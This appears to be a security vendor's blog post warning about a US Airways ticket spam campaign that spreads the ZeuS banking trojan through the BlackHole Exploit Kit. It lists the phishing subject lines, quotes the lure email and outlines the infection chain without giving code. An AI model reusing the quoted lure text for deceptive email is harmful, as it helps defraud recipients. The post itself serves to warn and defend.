I got a plane ticket from ZeuS!

At the moment there is no week without another spam campaign – this week we proudly present the US Airways ticket scam. The malware behind this scam is still the same as in the previous post, ZeuS a.k.a. Zbot, detected by Emsisoft Anti-Malware as Trojan-Spy.Win32.Zbot.

The following email subjects are being used:

  • US Airways online check-in.
  • US Airways online check-in confirmation.
  • US Airways reservation confirmation.
  • Confirm your US airways online reservation.

US Airways Spam Email

You have to check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying internationally). After the check-in, all you need to do is print your boarding pass and proceed to the gate.

Confirmation code: 772129

Check-in online: Online reservation details

Flight
8507

Departure city and time
Washington, DC (DCA) 10:00PM
Depart date: 4/5/2012

Clicking on the malicious link will take you to this screen:

US Airways Spam Email

By analyzing the source of the page we can see that it tries to access four JavaScripts from another URL:

US Airways Spam Email

All of these JavaScripts contact the same BlackHole Exploit Kit server containing the following text only:

US Airways Spam Email

The purpose of this address is to load Java and Adobe exploits to infect the system. Emsisoft Anti-Malware detects this threat as Exploit.Java.Blacole and Exploit.JS.Pdfka.

US Airways Spam Email

Finally, once the system is exploited more malicious executables are downloaded to continue stealing sensitive account information.

ZeuS is one of most known banking trojans and spread very widely. We recommend you to keep your security software and Java and Adobe products updated.